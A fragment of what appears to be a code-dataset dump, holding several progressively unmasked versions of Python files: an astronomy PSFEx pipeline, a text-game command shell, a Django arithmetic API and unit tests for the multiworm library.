{ic.SEEING0:.2f}\\n\")\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\\n\")\n\t\tf.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')\n\t\tf.write(f\"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} \")\n\t\tf.write(f\"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} \")\n\t\tf.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')\n\t\tf.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\\n')\n\t\tf.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\\n')\n\t\tf.write('\\n')\n\tf.write('\\n\\n')\nf.close()\n\n\n# ----- Running scripts for PSFEx ----- #\nif (glob.glob(\"PSFEx/\") == []):\n\tos.system(\"mkdir PSFEx\")\nelse:\n\tos.system(\"rm -rfv PSFEx/*\")\n\nos.system(\"sh psfex_all.sh\")\n\nos.system(\"mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/\")\nos.system(\"mv -v prepsfex_*-*.cat PSFEx/\")\nos.system(\"rm -rfv ./*.fits prepsfex_*.cat\")\n\n\n# Printing the running time \nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class CMD(Cmd):
def __init__(self):
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def do_drawCard(self):
pass
<|reserved_special_token_0|>
def do_fight(self):
pass
def do_save(self, fileName):
self.game.save(fileName)
def do_load(self, fileName):
self.game.load(fileName)
def do_quit(self):
return True
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CMD(Cmd):
def __init__(self):
pass
def do_move(self, direction):
if direction == 'up':
self.game.movePlayer(0, 1)
elif direction == 'down':
self.game.movePlayer(0, -1)
elif direction == 'left':
self.game.movePlayer(-1, 0)
elif direction == 'right':
self.game.movePlayer(1, 0)
else:
print('No valid direction given.')
def do_rotateTile(self, rotation):
pass
<|reserved_special_token_0|>
def do_drawCard(self):
pass
<|reserved_special_token_0|>
def do_fight(self):
pass
def do_save(self, fileName):
self.game.save(fileName)
def do_load(self, fileName):
self.game.load(fileName)
def do_quit(self):
return True
def validateCommands(self):
pass
def loadFile(filePath):
self.game.loadFile(filePath)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CMD(Cmd):
def __init__(self):
pass
def do_move(self, direction):
if direction == 'up':
self.game.movePlayer(0, 1)
elif direction == 'down':
self.game.movePlayer(0, -1)
elif direction == 'left':
self.game.movePlayer(-1, 0)
elif direction == 'right':
self.game.movePlayer(1, 0)
else:
print('No valid direction given.')
def do_rotateTile(self, rotation):
pass
<|reserved_special_token_0|>
def do_drawCard(self):
pass
def do_run(self):
pass
def do_fight(self):
pass
def do_save(self, fileName):
self.game.save(fileName)
def do_load(self, fileName):
self.game.load(fileName)
def do_quit(self):
return True
def validateCommands(self):
pass
def loadFile(filePath):
self.game.loadFile(filePath)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CMD(Cmd):
def __init__(self):
pass
def do_move(self, direction):
if direction == 'up':
self.game.movePlayer(0, 1)
elif direction == 'down':
self.game.movePlayer(0, -1)
elif direction == 'left':
self.game.movePlayer(-1, 0)
elif direction == 'right':
self.game.movePlayer(1, 0)
else:
print('No valid direction given.')
def do_rotateTile(self, rotation):
pass
def do_placeTile(self):
pass
def do_drawCard(self):
pass
def do_run(self):
pass
def do_fight(self):
pass
def do_save(self, fileName):
self.game.save(fileName)
def do_load(self, fileName):
self.game.load(fileName)
def do_quit(self):
return True
def validateCommands(self):
pass
def loadFile(filePath):
self.game.loadFile(filePath)
<|reserved_special_token_1|>
from cmd import Cmd
class CMD(Cmd):
def __init__(self):
pass
def do_move(self, direction):
if direction == "up":
self.game.movePlayer(0, 1)
elif direction == "down":
self.game.movePlayer(0, -1)
elif direction == "left":
self.game.movePlayer(-1, 0)
elif direction == "right":
self.game.movePlayer(1, 0)
else:
print("No valid direction given.")
def do_rotateTile(self, rotation):
pass
def do_placeTile(self):
pass
def do_drawCard(self):
pass
def do_run(self):
pass
def do_fight(self):
pass
def do_save(self, fileName):
self.game.save(fileName)
def do_load(self, fileName):
self.game.load(fileName)
def do_quit(self):
return True
def validateCommands(self):
pass
# New
def loadFile(filePath):
self.game.loadFile(filePath)
# End New
|
flexible
|
{
"blob_id": "03a024140d8d0136bf9838f8942539f6d19bb351",
"index": 1866,
"step-1": "<mask token>\n\n\nclass CMD(Cmd):\n\n def __init__(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n def do_drawCard(self):\n pass\n <mask token>\n\n def do_fight(self):\n pass\n\n def do_save(self, fileName):\n self.game.save(fileName)\n\n def do_load(self, fileName):\n self.game.load(fileName)\n\n def do_quit(self):\n return True\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CMD(Cmd):\n\n def __init__(self):\n pass\n\n def do_move(self, direction):\n if direction == 'up':\n self.game.movePlayer(0, 1)\n elif direction == 'down':\n self.game.movePlayer(0, -1)\n elif direction == 'left':\n self.game.movePlayer(-1, 0)\n elif direction == 'right':\n self.game.movePlayer(1, 0)\n else:\n print('No valid direction given.')\n\n def do_rotateTile(self, rotation):\n pass\n <mask token>\n\n def do_drawCard(self):\n pass\n <mask token>\n\n def do_fight(self):\n pass\n\n def do_save(self, fileName):\n self.game.save(fileName)\n\n def do_load(self, fileName):\n self.game.load(fileName)\n\n def do_quit(self):\n return True\n\n def validateCommands(self):\n pass\n\n def loadFile(filePath):\n self.game.loadFile(filePath)\n",
"step-3": "<mask token>\n\n\nclass CMD(Cmd):\n\n def __init__(self):\n pass\n\n def do_move(self, direction):\n if direction == 'up':\n self.game.movePlayer(0, 1)\n elif direction == 'down':\n self.game.movePlayer(0, -1)\n elif direction == 'left':\n self.game.movePlayer(-1, 0)\n elif direction == 'right':\n self.game.movePlayer(1, 0)\n else:\n print('No valid direction given.')\n\n def do_rotateTile(self, rotation):\n pass\n <mask token>\n\n def do_drawCard(self):\n pass\n\n def do_run(self):\n pass\n\n def do_fight(self):\n pass\n\n def do_save(self, fileName):\n self.game.save(fileName)\n\n def do_load(self, fileName):\n self.game.load(fileName)\n\n def do_quit(self):\n return True\n\n def validateCommands(self):\n pass\n\n def loadFile(filePath):\n self.game.loadFile(filePath)\n",
"step-4": "<mask token>\n\n\nclass CMD(Cmd):\n\n def __init__(self):\n pass\n\n def do_move(self, direction):\n if direction == 'up':\n self.game.movePlayer(0, 1)\n elif direction == 'down':\n self.game.movePlayer(0, -1)\n elif direction == 'left':\n self.game.movePlayer(-1, 0)\n elif direction == 'right':\n self.game.movePlayer(1, 0)\n else:\n print('No valid direction given.')\n\n def do_rotateTile(self, rotation):\n pass\n\n def do_placeTile(self):\n pass\n\n def do_drawCard(self):\n pass\n\n def do_run(self):\n pass\n\n def do_fight(self):\n pass\n\n def do_save(self, fileName):\n self.game.save(fileName)\n\n def do_load(self, fileName):\n self.game.load(fileName)\n\n def do_quit(self):\n return True\n\n def validateCommands(self):\n pass\n\n def loadFile(filePath):\n self.game.loadFile(filePath)\n",
"step-5": "from cmd import Cmd\n\nclass CMD(Cmd):\n def __init__(self):\n pass\n\n def do_move(self, direction):\n if direction == \"up\":\n self.game.movePlayer(0, 1)\n elif direction == \"down\":\n self.game.movePlayer(0, -1)\n elif direction == \"left\":\n self.game.movePlayer(-1, 0)\n elif direction == \"right\":\n self.game.movePlayer(1, 0)\n else:\n print(\"No valid direction given.\")\n\n def do_rotateTile(self, rotation):\n pass\n\n def do_placeTile(self):\n pass\n\n def do_drawCard(self):\n pass\n\n def do_run(self):\n pass\n\n def do_fight(self):\n pass\n\n def do_save(self, fileName):\n self.game.save(fileName)\n\n def do_load(self, fileName):\n self.game.load(fileName)\n\n def do_quit(self):\n return True\n\n def validateCommands(self):\n pass\n\n # New\n def loadFile(filePath):\n self.game.loadFile(filePath)\n # End New\n",
"step-ids": [
7,
11,
12,
13,
15
]
}
|
[
7,
11,
12,
13,
15
] |
from django.http import HttpResponseRedirect
from django.shortcuts import render
__author__ = 'jhonjairoroa87'
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework_jsonp.renderers import JSONPRenderer
from django.db import models
from .form import NameForm
def multiply(a,b):
return a*b
class Multiply(APIView):
renderer_classes = (JSONPRenderer,)
@staticmethod
def get(request):
form = NameForm()
return render(request, 'name.html', {'form': form})
@staticmethod
def post(request):
form = NameForm(request.POST)
if form.is_valid():
a = form.cleaned_data['one']
b = form.cleaned_data['second']
data = multiply(a, b)
return render(request, 'name.html', {'data': data})
else:
return render(request, 'name.html', {'data': "error"})
class Divide(APIView):
renderer_classes = (JSONPRenderer,)
@staticmethod
def get(request):
try:
first_number = int(request.GET.get('a'))
second_number = int(request.GET.get('b'))
return Response({'result': first_number / second_number})
except Exception as e:
return Response({'result': 'there was an error ' + str(e)})
|
normal
|
{
"blob_id": "4c483636316dfa660f10b1aba900813bc3e95ebe",
"index": 9463,
"step-1": "<mask token>\n\n\nclass Divide(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n try:\n first_number = int(request.GET.get('a'))\n second_number = int(request.GET.get('b'))\n return Response({'result': first_number / second_number})\n except Exception as e:\n return Response({'result': 'there was an error ' + str(e)})\n",
"step-2": "<mask token>\n\n\nclass Multiply(APIView):\n <mask token>\n\n @staticmethod\n def get(request):\n form = NameForm()\n return render(request, 'name.html', {'form': form})\n\n @staticmethod\n def post(request):\n form = NameForm(request.POST)\n if form.is_valid():\n a = form.cleaned_data['one']\n b = form.cleaned_data['second']\n data = multiply(a, b)\n return render(request, 'name.html', {'data': data})\n else:\n return render(request, 'name.html', {'data': 'error'})\n\n\nclass Divide(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n try:\n first_number = int(request.GET.get('a'))\n second_number = int(request.GET.get('b'))\n return Response({'result': first_number / second_number})\n except Exception as e:\n return Response({'result': 'there was an error ' + str(e)})\n",
"step-3": "<mask token>\n__author__ = 'jhonjairoroa87'\n<mask token>\n\n\ndef multiply(a, b):\n return a * b\n\n\nclass Multiply(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n form = NameForm()\n return render(request, 'name.html', {'form': form})\n\n @staticmethod\n def post(request):\n form = NameForm(request.POST)\n if form.is_valid():\n a = form.cleaned_data['one']\n b = form.cleaned_data['second']\n data = multiply(a, b)\n return render(request, 'name.html', {'data': data})\n else:\n return render(request, 'name.html', {'data': 'error'})\n\n\nclass Divide(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n try:\n first_number = int(request.GET.get('a'))\n second_number = int(request.GET.get('b'))\n return Response({'result': first_number / second_number})\n except Exception as e:\n return Response({'result': 'there was an error ' + str(e)})\n",
"step-4": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n__author__ = 'jhonjairoroa87'\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework_jsonp.renderers import JSONPRenderer\nfrom django.db import models\nfrom .form import NameForm\n\n\ndef multiply(a, b):\n return a * b\n\n\nclass Multiply(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n form = NameForm()\n return render(request, 'name.html', {'form': form})\n\n @staticmethod\n def post(request):\n form = NameForm(request.POST)\n if form.is_valid():\n a = form.cleaned_data['one']\n b = form.cleaned_data['second']\n data = multiply(a, b)\n return render(request, 'name.html', {'data': data})\n else:\n return render(request, 'name.html', {'data': 'error'})\n\n\nclass Divide(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n try:\n first_number = int(request.GET.get('a'))\n second_number = int(request.GET.get('b'))\n return Response({'result': first_number / second_number})\n except Exception as e:\n return Response({'result': 'there was an error ' + str(e)})\n",
"step-5": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n\n__author__ = 'jhonjairoroa87'\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework_jsonp.renderers import JSONPRenderer\nfrom django.db import models\nfrom .form import NameForm\n\n\ndef multiply(a,b):\n return a*b\n\nclass Multiply(APIView):\n\n renderer_classes = (JSONPRenderer,)\n\n @staticmethod\n def get(request):\n form = NameForm()\n\n return render(request, 'name.html', {'form': form})\n\n @staticmethod\n def post(request):\n form = NameForm(request.POST)\n if form.is_valid():\n a = form.cleaned_data['one']\n b = form.cleaned_data['second']\n data = multiply(a, b)\n return render(request, 'name.html', {'data': data})\n else:\n return render(request, 'name.html', {'data': \"error\"})\n\n\nclass Divide(APIView):\n\n renderer_classes = (JSONPRenderer,)\n\n @staticmethod\n def get(request):\n try:\n first_number = int(request.GET.get('a'))\n second_number = int(request.GET.get('b'))\n return Response({'result': first_number / second_number})\n except Exception as e:\n return Response({'result': 'there was an error ' + str(e)})\n\n",
"step-ids": [
3,
6,
9,
10,
11
]
}
|
[
3,
6,
9,
10,
11
] |
<|reserved_special_token_0|>
class TestExperimentOpen(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class TestMalformedExperiments(unittest.TestCase):
def test_nonexistent_folder(self):
try:
ex = multiworm.Experiment(DATA_DIR /
'guaranteedtohopefullynotbethere')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('exist', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_check_is_dir(self):
try:
ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('directory', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_missing_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_empty')
except multiworm.core.MWTDataError as e:
pass
else:
self.fail("Didn't raise error despite no summary file")
def test_dupe_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')
except multiworm.core.MWTSummaryError as e:
pass
else:
self.fail("Didn't raise error with ambiguous summary file")
class TestMalformedData(unittest.TestCase):
def test_zero_frame(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')
except multiworm.core.MWTDataError:
pass
else:
self.fail("Didn't raise error on malformed data with a frame 0")
class TestReadingData(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_length_is_num_blobs(self):
self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))
def test_iter(self):
count = 0
for thing in self.ex:
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
def test_iter_blobs(self):
count = 0
for thing in self.ex.blobs():
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
class TestExperimentProperties(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_blobs_in_frame(self):
self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))
self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))
)
def test_locked_graph(self):
try:
self.ex.graph.add_node(123)
except nx.NetworkXError as e:
self.assertIn('frozen', str(e).lower())
else:
self.fail('experiment graph should be frozen/locked')
def test_graph_copy_unlocked(self):
G = self.ex.graph.copy()
G.add_node(123)
G.add_edge(55, 66)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestExperimentOpen(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_callback(self):
class StateThing(object):
def __init__(self):
self.progress = -1
def __call__(self, progress):
assert progress >= self.progress
self.progress = progress
ex = multiworm.Experiment(SYNTH1, callback=StateThing())
class TestMalformedExperiments(unittest.TestCase):
def test_nonexistent_folder(self):
try:
ex = multiworm.Experiment(DATA_DIR /
'guaranteedtohopefullynotbethere')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('exist', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_check_is_dir(self):
try:
ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('directory', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_missing_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_empty')
except multiworm.core.MWTDataError as e:
pass
else:
self.fail("Didn't raise error despite no summary file")
def test_dupe_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')
except multiworm.core.MWTSummaryError as e:
pass
else:
self.fail("Didn't raise error with ambiguous summary file")
class TestMalformedData(unittest.TestCase):
def test_zero_frame(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')
except multiworm.core.MWTDataError:
pass
else:
self.fail("Didn't raise error on malformed data with a frame 0")
class TestReadingData(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_length_is_num_blobs(self):
self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))
def test_iter(self):
count = 0
for thing in self.ex:
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
def test_iter_blobs(self):
count = 0
for thing in self.ex.blobs():
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
class TestExperimentProperties(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_blobs_in_frame(self):
self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))
self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))
)
def test_locked_graph(self):
try:
self.ex.graph.add_node(123)
except nx.NetworkXError as e:
self.assertIn('frozen', str(e).lower())
else:
self.fail('experiment graph should be frozen/locked')
def test_graph_copy_unlocked(self):
G = self.ex.graph.copy()
G.add_node(123)
G.add_edge(55, 66)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestExperimentOpen(unittest.TestCase):
def test_pathlib(self):
ex = multiworm.Experiment(SYNTH1)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_strroot_and_id(self):
ex = multiworm.Experiment(data_root=str(DATA_DIR), experiment_id=
'synth1')
def test_empty_fail(self):
try:
multiworm.Experiment()
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must',
'provided']):
self.fail('error message unexpected')
else:
self.fail('experiment constructor worked with no arguments')
def test_dataroot_only_fail(self):
try:
multiworm.Experiment(data_root=DATA_DIR)
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must',
'provided']):
self.fail('error message unexpected')
else:
self.fail(
'experiment constructor allowed data-root only without erroring'
)
def test_custom_id(self):
my_id = 'peterspeppers'
ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)
self.assertEquals(ex.id, my_id)
def test_callback(self):
class StateThing(object):
def __init__(self):
self.progress = -1
def __call__(self, progress):
assert progress >= self.progress
self.progress = progress
ex = multiworm.Experiment(SYNTH1, callback=StateThing())
class TestMalformedExperiments(unittest.TestCase):
def test_nonexistent_folder(self):
try:
ex = multiworm.Experiment(DATA_DIR /
'guaranteedtohopefullynotbethere')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('exist', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_check_is_dir(self):
try:
ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('directory', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_missing_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_empty')
except multiworm.core.MWTDataError as e:
pass
else:
self.fail("Didn't raise error despite no summary file")
def test_dupe_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')
except multiworm.core.MWTSummaryError as e:
pass
else:
self.fail("Didn't raise error with ambiguous summary file")
class TestMalformedData(unittest.TestCase):
def test_zero_frame(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')
except multiworm.core.MWTDataError:
pass
else:
self.fail("Didn't raise error on malformed data with a frame 0")
class TestReadingData(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_length_is_num_blobs(self):
self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))
def test_iter(self):
count = 0
for thing in self.ex:
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
def test_iter_blobs(self):
count = 0
for thing in self.ex.blobs():
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
class TestExperimentProperties(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_blobs_in_frame(self):
self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))
self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))
)
def test_locked_graph(self):
try:
self.ex.graph.add_node(123)
except nx.NetworkXError as e:
self.assertIn('frozen', str(e).lower())
else:
self.fail('experiment graph should be frozen/locked')
def test_graph_copy_unlocked(self):
G = self.ex.graph.copy()
G.add_node(123)
G.add_edge(55, 66)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
TEST_ROOT = pathlib.Path(__file__).parent.resolve()
DATA_DIR = TEST_ROOT / 'data'
SYNTH1 = DATA_DIR / 'synth1'
SYNTH1_N_BLOBS = 12
class TestExperimentOpen(unittest.TestCase):
def test_pathlib(self):
ex = multiworm.Experiment(SYNTH1)
def test_strpath(self):
ex = multiworm.Experiment(str(SYNTH1))
def test_root_and_id(self):
ex = multiworm.Experiment(data_root=DATA_DIR, experiment_id='synth1')
def test_strroot_and_id(self):
ex = multiworm.Experiment(data_root=str(DATA_DIR), experiment_id=
'synth1')
def test_empty_fail(self):
try:
multiworm.Experiment()
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must',
'provided']):
self.fail('error message unexpected')
else:
self.fail('experiment constructor worked with no arguments')
def test_dataroot_only_fail(self):
try:
multiworm.Experiment(data_root=DATA_DIR)
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must',
'provided']):
self.fail('error message unexpected')
else:
self.fail(
'experiment constructor allowed data-root only without erroring'
)
def test_custom_id(self):
my_id = 'peterspeppers'
ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)
self.assertEquals(ex.id, my_id)
def test_callback(self):
class StateThing(object):
def __init__(self):
self.progress = -1
def __call__(self, progress):
assert progress >= self.progress
self.progress = progress
ex = multiworm.Experiment(SYNTH1, callback=StateThing())
class TestMalformedExperiments(unittest.TestCase):
def test_nonexistent_folder(self):
try:
ex = multiworm.Experiment(DATA_DIR /
'guaranteedtohopefullynotbethere')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('exist', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_check_is_dir(self):
try:
ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('directory', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_missing_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_empty')
except multiworm.core.MWTDataError as e:
pass
else:
self.fail("Didn't raise error despite no summary file")
def test_dupe_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')
except multiworm.core.MWTSummaryError as e:
pass
else:
self.fail("Didn't raise error with ambiguous summary file")
class TestMalformedData(unittest.TestCase):
def test_zero_frame(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')
except multiworm.core.MWTDataError:
pass
else:
self.fail("Didn't raise error on malformed data with a frame 0")
class TestReadingData(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_length_is_num_blobs(self):
self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))
def test_iter(self):
count = 0
for thing in self.ex:
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
def test_iter_blobs(self):
count = 0
for thing in self.ex.blobs():
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
class TestExperimentProperties(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_blobs_in_frame(self):
self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))
self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))
)
def test_locked_graph(self):
try:
self.ex.graph.add_node(123)
except nx.NetworkXError as e:
self.assertIn('frozen', str(e).lower())
else:
self.fail('experiment graph should be frozen/locked')
def test_graph_copy_unlocked(self):
G = self.ex.graph.copy()
G.add_node(123)
G.add_edge(55, 66)
<|reserved_special_token_1|>
from __future__ import absolute_import, print_function, unicode_literals
import six
from six.moves import zip, filter, map, reduce, input, range
import pathlib
import unittest
import networkx as nx
import multiworm
TEST_ROOT = pathlib.Path(__file__).parent.resolve()
DATA_DIR = TEST_ROOT / 'data'
SYNTH1 = DATA_DIR / 'synth1'
SYNTH1_N_BLOBS = 12
class TestExperimentOpen(unittest.TestCase):
def test_pathlib(self):
ex = multiworm.Experiment(SYNTH1)
def test_strpath(self):
ex = multiworm.Experiment(str(SYNTH1))
def test_root_and_id(self):
ex = multiworm.Experiment(
data_root=DATA_DIR,
experiment_id='synth1',
)
def test_strroot_and_id(self):
ex = multiworm.Experiment(
data_root=str(DATA_DIR),
experiment_id='synth1',
)
def test_empty_fail(self):
try:
multiworm.Experiment()
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must', 'provided']):
self.fail('error message unexpected')
else:
self.fail('experiment constructor worked with no arguments')
def test_dataroot_only_fail(self):
try:
multiworm.Experiment(data_root=DATA_DIR)
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must', 'provided']):
self.fail('error message unexpected')
else:
self.fail('experiment constructor allowed data-root only without erroring')
def test_custom_id(self):
my_id = 'peterspeppers'
ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)
self.assertEquals(ex.id, my_id)
def test_callback(self):
class StateThing(object):
def __init__(self):
self.progress = -1
def __call__(self, progress):
assert progress >= self.progress
self.progress = progress
ex = multiworm.Experiment(SYNTH1, callback=StateThing())
class TestMalformedExperiments(unittest.TestCase):
def test_nonexistent_folder(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'guaranteedtohopefullynotbethere')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('exist', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_check_is_dir(self):
try:
ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('directory', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_missing_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_empty')
except multiworm.core.MWTDataError as e:
pass
else:
self.fail("Didn't raise error despite no summary file")
def test_dupe_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')
except multiworm.core.MWTSummaryError as e:
pass
else:
self.fail("Didn't raise error with ambiguous summary file")
class TestMalformedData(unittest.TestCase):
def test_zero_frame(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')
except multiworm.core.MWTDataError:
pass
else:
self.fail("Didn't raise error on malformed data with a frame 0")
class TestReadingData(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_length_is_num_blobs(self):
self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))
def test_iter(self):
count = 0
for thing in self.ex:
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
def test_iter_blobs(self):
count = 0
for thing in self.ex.blobs():
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
class TestExperimentProperties(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_blobs_in_frame(self):
self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))
self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12)))
def test_locked_graph(self):
try:
self.ex.graph.add_node(123)
except nx.NetworkXError as e:
self.assertIn('frozen', str(e).lower())
else:
self.fail('experiment graph should be frozen/locked')
def test_graph_copy_unlocked(self):
G = self.ex.graph.copy()
G.add_node(123)
G.add_edge(55, 66)
|
flexible
|
{
"blob_id": "dfee0407eaed7b1ab96467874bbfe6463865bcb4",
